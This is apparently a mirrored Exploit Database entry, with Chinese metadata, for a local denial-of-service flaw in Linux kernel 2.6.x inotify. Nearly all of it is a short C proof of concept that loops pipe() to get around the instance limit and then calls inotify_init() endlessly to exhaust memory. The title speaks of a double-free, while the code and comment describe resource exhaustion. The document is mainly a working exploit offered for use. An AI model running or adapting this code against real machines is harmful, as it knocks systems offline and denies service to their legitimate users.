Linux Kernel 2.6.x – ‘inotify_init1()’ Double-Free Local Denial of Service

• Exploit Database
• 16 阅读

• 作者： anonymous
  日期： 2011-04-11
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/35600/

• /*
  source: https://www.securityfocus.com/bid/47296/info
  
  The Linux kernel is prone to a local denial-of-service vulnerability.
  
  Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users. 
  */
  
  #include <sys/inotify.h>
  #include <unistd.h>
  
  int main(int argc, char *argv[])
  {
  int fds[2];
  
  /* Circumvent max inotify instances limit */
  while (pipe(fds) != -1)
  ;
  
  while (1)
  inotify_init();
  
  return 0;
  }